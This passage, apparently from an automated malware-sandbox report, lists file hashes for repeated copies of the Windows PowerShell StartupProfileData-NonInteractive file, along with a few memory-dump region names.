| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d3235ed022a42ec4338123ab87144afa |
| SHA1 | 5058608bc0deb720a585a2304a8f7cf63a50a315 |
| SHA256 | 10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27 |
| SHA512 | 236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7e855de5861571374efc63dacc84638b |
| SHA1 | 54bc201ab83ab18ef4c8009b307ae7c6d041369e |
| SHA256 | aaef6c1145f7994603ccc9477b801b498e77401e1a9e0e0e1e6a585c74fe7a2a |
| SHA512 | db1e4028123b5991525d386d13b20011259e58db8cee4662714d6fe1b2ef48816f0fa2f8e36da3713a8aedb04cbaccf778aa4015cd2475b4371450cea73745bb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6317adf4fbc43ea2fd68861fafd57155 |
| SHA1 | 6b87c718893c83c6eed2767e8d9cbc6443e31913 |
| SHA256 | c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af |
| SHA512 | 17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 58b80fe8da7d23cd3c9707f4ce93457e |
| SHA1 | 7d1c58b992631d82cabd38d738ccca072c91c124 |
| SHA256 | 4479db3e2faf952801a1506140f3612e267e9bb4f5d509b0d63204429de8eef3 |
| SHA512 | 82ef5d29aaf46b5fef467185193f03612058c4bbd7b9926293a79c18deefe137811f95dc59feaa649376c8711ca3253177177b538d2d953147db1ed719cba5e8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1ff7c767b41e57bd6662b9b45b7e4331 |
| SHA1 | e484ee08429d6403c5beb97582f2bc88567d2d45 |
| SHA256 | c37e94da3e67f9473d2f0f51725c4246eefdbd2c01b3603d1b218842afc05048 |
| SHA512 | 310cdae4625b1c391eab4adc7e139da6da6cbc2f8eda386ec6aa23da7967fe3dad6792ccd4bed0a0a320c466363051927ff376487080f77b50bf325098651483 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ba169f4dcbbf147fe78ef0061a95e83b |
| SHA1 | 92a571a6eef49fff666e0f62a3545bcd1cdcda67 |
| SHA256 | 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1 |
| SHA512 | 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c |
memory/1896-85-0x000002047D1D0000-0x000002047D3EC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c58a75389f1ab258652c47081e1ddb5a |
| SHA1 | d95f18dd3174cd5452b278aa2c7e5394567e32a8 |
| SHA256 | 3e2f43d6dbf3177dc0c46fce82fc23ec2d694f09cae9c44761b901bdf5f725bf |
| SHA512 | b928fb48a51e56d2554584c9275f0fd70f1c751b725c7f054a8049268e6a31a2357cf9f77671f69fb5a781e0b12a70324ee844660fcfa5b4a3a44d74f12aee6a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | da5c82b0e070047f7377042d08093ff4 |
| SHA1 | 89d05987cd60828cca516c5c40c18935c35e8bd3 |
| SHA256 | 77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5 |
| SHA512 | 7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b |
memory/2084-108-0x0000012CFCA40000-0x0000012CFCC5C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3996d8b0c44a2fdabdabbfaffda948c5 |
| SHA1 | 30b099e2995c339c2a6abfa727258235feb817b6 |
| SHA256 | 70b3dceb0039e84d5ab7fc7f5757ece6e6a6acb593eb0f95e979da80ec454101 |
| SHA512 | 0fe9e6f96b4417d94c966d6e65f129520f3ccd3359e6e831e29b654f2d90ed09dec45947be94ed3e59109783d8e01ddf2035593609f2d8dc41104644ab107dd7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 34f595487e6bfd1d11c7de88ee50356a |
| SHA1 | 4caad088c15766cc0fa1f42009260e9a02f953bb |
| SHA256 | 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d |
| SHA512 | 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b |
memory/4444-153-0x000001CE2D410000-0x000001CE2D62C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1bcffb21fd74d59b3233b56b614eb133 |
| SHA1 | 654c816ff08d2b47e574a8ac87c2e89d909f78eb |
| SHA256 | 96b1a17c2b8bf7d3e52466259d86310231885632e12a55ecdcb8b15b722725db |
| SHA512 | c8dc82344f039010d0ddee4045d8e3752726c335c5dfadd2f8af316db89c27be892b762baad2ce0d2b4480f84b999e5ec174d0286d08c4000e3c106d7d506cfb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b2600662b39ee59512f530131c038b45 |
| SHA1 | c417eecbd7fd9c0f143261279c17cdc83783c95c |
| SHA256 | b2cd3884c706629b0e92856ba2643c4062d98480d38a36e4ac10f6a6695ed8c2 |
| SHA512 | 97bbb9a0859b3e01a5d789b5d242c07b35e8f80a7ccf7e2e9af1ff31cf0a3497cc23603754407140a7602bb1a3edd7ec71529a0b9a7460b700ebcd72306bd3af |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5c964bb22371323b8064895892ab211e |
| SHA1 | a23e9564b96d7a3e8b4a90abd0c7993d87e314fe |
| SHA256 | 80229da91bb7b07ea68d18e5a89a54988520c314030b252bd0e14584bbb0669f |
| SHA512 | dd32dc25e1150fe04d0dde6677d3a555cd7c0428faf2ad071e4bb7e434c808c6c17186e55867330f78f528009b74e511644f1278815551c3e19b37532151f1c8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7511c81925750deb7ad1b9b80eea8a8d |
| SHA1 | 6ea759b3cbd243ae11435c6d6c5ced185eb01f49 |
| SHA256 | 5b49723a7773f2fe1f6093236e7b9b2c546f0873635d02346cb39535811234fa |
| SHA512 | 5f7e69316d39525d137a7a833f8c746ceef8f1b2295348393fb3244cca8b962fbaad0f7da49da453fe97e2c49b1f41f06138111ac5ff97fdc33c300350ec3a1b |